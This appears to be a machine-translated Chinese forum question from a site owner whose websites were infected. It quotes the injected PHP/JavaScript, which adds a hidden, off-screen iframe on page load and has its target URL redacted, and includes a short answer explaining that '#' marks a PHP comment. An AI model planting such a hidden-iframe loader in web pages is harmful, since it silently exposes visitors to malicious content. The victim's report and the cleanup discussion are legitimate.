可能重复:
Clean server infected with c3284d virus, using search and replace
今天在我的几个网站上找到了这个脚本,我知道脚本的作用但是散列的内容是做什么的?它会影响ftp工具吗?我无法下载包含内容的文件?这是服务器方面的问题吗?我正在使用的主题是Dynamix是否存在该主题中的漏洞,或者我认为它是我的主持人是正确的? 为什么文件无法通过ftp下载或编辑?
#c3284d#
echo "<script type=\"text/javascript\">
function frmAdd() {
var ifrm = document.createElement('iframe');
ifrm.style.position='absolute';
ifrm.style.top='-999em';
ifrm.style.left='-999em';
ifrm.src = \"***redacted***\";
ifrm.id = 'frmId';
document.body.appendChild(ifrm);
};
window.onload = frmAdd;
</script>
";
#/c3284d#
我有网站的备份,所以我对搜索和替换所有内容不感兴趣!因为像一个用户说干净的一个错误,还有更多的出现!
答案 0 :(得分:1)
php中的哈希相当于//
所以这只是一个评论
他们可能会解析您的页面并查找该值并将其中的所有内容都包含在内。